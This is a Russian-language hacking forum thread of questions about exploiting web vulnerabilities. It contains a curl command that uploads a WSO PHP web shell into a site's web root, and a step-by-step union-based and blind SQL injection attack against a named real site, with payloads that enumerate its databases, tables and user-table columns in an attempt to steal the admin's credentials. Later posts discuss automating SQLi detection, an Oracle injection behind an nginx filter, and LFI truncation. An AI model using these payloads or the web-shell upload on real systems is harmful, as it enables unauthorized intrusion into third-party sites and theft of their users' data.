Ваши вопросы по уязвимостям.

Code:

curl -F "file=@/home/user/shell/wso2.php" -F "Name=/var/www/wso2.php" http://site.com/file.php

где "file=@/home/user/shell/wso2.php" путь до шелла на вашем пк. файл будет перемещен в папку "/var/www/" и доступен по адресу http://site.com/file.php, если /var/www/ путь до корневой папки сайта.

если передать в качестве Name="./", файл будет перемещен в ту же папку, где выполняется ваш скрипт. и доступен из под веба там же

 

подскажите,пожалуйста.
при таком запросе сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(select+distinct+concat(0x27,unhex(Hex(cast(schema_name+as+char))),0x27)+from+`information_schema`.schemata+limit+1,1),0x31303235343830303536-- узнаю название базы ,но вытащить таблицы не могу сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(select+concat(0x27,count(table_name),0x27)+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463),0x31303235343830303536--
как можно вытащить таблицы из базы?

 

у вас функция count(table_name) — она выводит количество таблиц в вашей базе. чтобы вывести таблицы, запрос будет примерно таким:

Code:

?id=2+union+all+select+0x31303235343830303536,(select+concat(0x7e,0x27,table_name,0x27,0x7e)+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463+limit+1,1),0x31303235343830303536--

и да, havij — грешно. нормальный запрос бы выглядел так:

Code:

+union+select+1,table_name,2+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463+limit+1,1--+

далее перебирайте limit.

 

спасибо конечно,вот только без havij никак,редирект на главную стр.(

да и havij дальше имя базы не продвигается((

вот ссылка http://bitptc. com/recommends/?id=5 db justbitc_bitptc

 

тогда в вашем случае стоит раскручивать как blind sql.

Code:

http://bitptc.com/recommends/?id=5+and+1=1--+

- редирект (значит запрос корректен)

Code:

http://bitptc.com/recommends/?id=5+and+1=2--+

- нет редиректа

 

забавный случай. ответ отдается в редиректе, то есть при запросе

Code:

http://bitptc.com/recommends/?id=-5+union+select+1,version(),3--+

получим ответ в редиректе с версией

 

все правильно, но таблицы вывести не получится, прав не хватит

 

есть там всё

Code:

http://bitptc.com/recommends/?id=-5+union+select+1,/*!table_name*/,3+from+information_schema.tables--+

 

блин((
а как теперь из таблицы например microfaucet_users вывести имена столбцов?

 

Code:

http://bitptc.com/recommends/?id=-5+union+select+1,/*!column_name*/,3+from+information_schema.columns+where+/*!table_name*/=0x6d6963726f6661756365745f7573657273--+

 

спасибо)) только логин и пасс админа всё равно не нашла(( видать в конфиге спрятал))

 

какие возможные алгоритмы для определния sqli? то, что пришло в голову:
берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?

 

иногда тупо order by помогает определить уязвимость

 

это ты глазами увидишь, а как быть с автоматизацией? вомзожен такой вариант, что размер страницы особо не поменяется (пара кб или меньше)

 

Как вариант можно рассмотреть через sleep(), как то на практике встречалась уязвимость, которая генерировала координаты на картинке, само тело страници не менялось, зато менялся вес картинки, пришлось писать скрипт для автоматизации скули где вес картинки больше n-го размера, там true.

 

Столкнулся тут с oracle. Иньекция ли это и возможно ли её раскрутить?

есть поле ввода, ввожу параметр ;; и выдаёт ошибку:

Code:

java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
Oracle Text error: DRG-50901: text query parser syntax error on line 1, column 3 ; 
ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
Oracle Text error: DRG-50901: text query parser syntax error on line 1, column 3 ORA-06512: at line 1

ввожу ">qweqweqwe;

Code:

java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold QWEQWEQWE ; 
ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold QWEQWEQWE ORA-06512: at line 1 

ввожу ">order+by+1;

Code:

 java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000: 
Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold ORDER+BY+1 ; 
ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() 
routine ORA-20000: Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold ORDER+BY+1 ORA-06512: at line 1

ввести select, union в любом регистре, откоментировать -- или /* не возможно, nginx фильтрует и сразу редиректит на страницу с ошибкой

Прошу помощи

 

как получать ссылку на некоторые элементы, например на лайки или палец вверх ?

вот например тут - как узнать запрос к этой кнопке ? и подобным кнопкам не имеющих в коде ссылок

 

посмотреть на сниффере, куда он отправляется. charles или tamper data в firefox.

 

Ребят, подскажите с обрезанием окончания к LFI

 

Альтернатива нулл байту не срабатывает(